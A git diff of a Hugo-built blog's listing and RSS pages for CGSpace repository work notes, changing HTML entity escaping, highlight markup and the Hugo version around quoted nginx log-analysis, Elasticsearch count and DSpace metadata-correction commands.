&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;count&amp;#34; : 100875,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;_shards&amp;#34; : {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;total&amp;#34; : 1,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;successful&amp;#34; : 1,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;skipped&amp;#34; : 0,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;failed&amp;#34; : 0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -599,17 +599,17 @@ COPY 20994
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
1277694
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;So 4.6 million from XMLUI and another 1.2 million from API requests&lt;/li&gt;
&lt;li&gt;Let&amp;rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot; | grep -c -E &amp;quot;/rest/bitstreams&amp;quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34; | grep -c -E &amp;#34;/rest/bitstreams&amp;#34;
106781
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -620,7 +620,7 @@ COPY 20994
<pubDate>Tue, 01 Oct 2019 13:20:51 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2019-10/</guid>
<description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unneccesary Unicode&amp;rdquo; fix: $ csvcut -c &#39;id,dc.</description>
<description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unneccesary Unicode&amp;rdquo; fix: $ csvcut -c &amp;#39;id,dc.</description>
</item>
<item>
@ -634,7 +634,7 @@ COPY 20994
&lt;li&gt;Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning&lt;/li&gt;
&lt;li&gt;Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;quot;01/Sep/2019:0&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -645,7 +645,7 @@ COPY 20994
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;quot;01/Sep/2019:0&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -761,16 +761,16 @@ DELETE 1
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &amp;#39;Spore-192-EN-web.pdf&amp;#39; | grep -E &amp;#39;(18.196.196.108|18.195.78.144|18.195.218.6)&amp;#39; | awk &amp;#39;{print $9}&amp;#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;In the last two weeks there have been 47,000 downloads of this &lt;em&gt;same exact PDF&lt;/em&gt; by these three IP addresses&lt;/li&gt;
&lt;li&gt;Apply country and region corrections and deletions on DSpace Test and CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 231 -f cg.coverage.region -d
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
&lt;li&gt;Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!&lt;/li&gt;
&lt;li&gt;The top IPs before, during, and after this latest alert tonight were:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;quot;01/Feb/2019:(17|18|19|20|21)&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;01/Feb/2019:(17|18|19|20|21)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
&lt;li&gt;The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase&lt;/li&gt;
&lt;li&gt;There were just over 3 million accesses in the nginx logs last month:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;quot;[0-9]{1,2}/Jan/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;#34;[0-9]{1,2}/Jan/2019&amp;#34;
3018243
real 0m19.873s
@ -844,7 +844,7 @@ sys 0m1.979s
&lt;li&gt;Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning&lt;/li&gt;
&lt;li&gt;I don&amp;rsquo;t see anything interesting in the web server logs around that time though:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;quot;02/Jan/2019:0(1|2|3)&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;02/Jan/2019:0(1|2|3)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -979,7 +979,7 @@ sys 0m1.979s
&lt;li&gt;I added the new CCAFS Phase II Project Tag &lt;code&gt;PII-FP1_PACCA2&lt;/code&gt; and merged it into the &lt;code&gt;5_x-prod&lt;/code&gt; branch (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/379&#34;&gt;#379&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;I proofed and tested the ILRI author corrections that Peter sent back to me this week:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f dc.contributor.author -t correct -m 3 -n
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/&#34;&gt;March, 2018&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Time to index ~70,000 items on CGSpace:&lt;/li&gt;
@ -1073,11 +1073,11 @@ sys 2m7.289s
&lt;li&gt;I notice this error quite a few times in dspace.log:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &amp;quot; &amp;quot;]&amp;quot; &amp;quot;] &amp;quot;&amp;quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &amp;#39;dateIssued_keyword:[1976+TO+1979]&amp;#39;: Encountered &amp;#34; &amp;#34;]&amp;#34; &amp;#34;] &amp;#34;&amp;#34; at line 1, column 32.
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;And there are many of these errors every day for the past month:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;quot;Error while searching for sidebar facets&amp;quot; dspace.log.*
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;#34;Error while searching for sidebar facets&amp;#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34
&lt;ul&gt;
&lt;li&gt;Today there have been no hits by CORE and no alerts from Linode (coincidence?)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;quot;CORE&amp;quot; /var/log/nginx/access.log
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;#34;CORE&amp;#34; /var/log/nginx/access.log
0
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;Generate list of authors on CGSpace for Peter to go through and correct:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &amp;#39;contributor&amp;#39; and qualifier = &amp;#39;author&amp;#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
&lt;/code&gt;&lt;/pre&gt;</description>
</item>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -206,17 +206,17 @@
<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
<li>Check the results of the AReS harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100875,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-02/'>Read more →</a>
</article>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -98,17 +98,17 @@
</ul>
</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
</code></pre><ul>
<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2019-11/'>Read more →</a>
@ -128,7 +128,7 @@
</p>
</header>
2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c 'id,dc.
2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc.
<a href='https://alanorth.github.io/cgspace-notes/2019-10/'>Read more →</a>
</article>
@ -151,7 +151,7 @@
<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -162,7 +162,7 @@
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -323,16 +323,16 @@ DELETE 1
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
</code></pre><ul>
<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2019-04/'>Read more →</a>
</article>
@ -388,7 +388,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
<li>The top IPs before, during, and after this latest alert tonight were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -404,7 +404,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
<li>There were just over 3 million accesses in the nginx logs last month:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -95,7 +95,7 @@
<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -293,7 +293,7 @@
<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
</code></pre><ul>
<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
<li>Time to index ~70,000 items on CGSpace:</li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -151,11 +151,11 @@
<li>I notice this error quite a few times in dspace.log:</li>
</ul>
